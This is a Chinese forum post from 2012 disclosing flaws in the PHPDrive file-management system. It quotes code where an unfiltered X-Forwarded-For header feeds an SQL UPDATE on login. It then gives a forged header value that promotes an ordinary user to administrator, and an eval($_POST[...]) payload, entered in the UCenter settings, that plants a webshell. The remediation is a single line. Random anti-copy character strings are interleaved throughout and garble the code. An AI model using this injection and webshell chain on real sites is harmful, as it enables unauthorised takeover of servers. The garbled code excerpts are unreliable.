PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等6 I3 y+ o+ G5 w* `3 n2 d1 Y
: n4 s y3 w! N/ C) E
includes/user.lib.php, q( _& x5 \4 y$ V4 k% ?% P" o
行87
! L/ `$ c* }2 W. M3 _ function get_ip() {2 [( B9 F7 s( G( i' s$ [9 l
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.$ y/ I0 F: Y' x; C5 I5 x9 P$ k
在用户注册与登录 处module/disk/account.lead.php5 W! @& W. b2 \- @, k' F |
198行
. z3 Z6 w, D- \2 Y! `! t1 `! j+ W //更新本次登录IP和时间3 o0 V7 P. N% I' w# e i1 {
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
/ T- T3 s; I+ u- }! S L由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
, M- o! P8 A( W6 G1 |实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.3 g; _) \* \( _9 ]; d9 D ]5 p6 Q* I
后台getshell:- A- }+ _, @5 T6 r% w3 g4 b
在UCenter设置处,将UC数据库登录名填写为
* U2 z( T( W" k# a ; D; I. ]% R- L5 v3 C* W2 J; t" z
root’);eval($_POST[DisKill]);?>/*/ _, w; d3 o4 n: E5 O$ @
可以得到一个shell,位置在 data/uc.data.php
* [; N) p4 R7 N& _$ O, y" x9 r
; O" C2 V. K% _) H3 a' X% x修复:过滤注入
" G6 ^" @+ _ ~0 O* R4 k- E% ^& \5 v' Z) r5 G
|
发表于 2012-12-31 09:18:34
收藏
支持
反对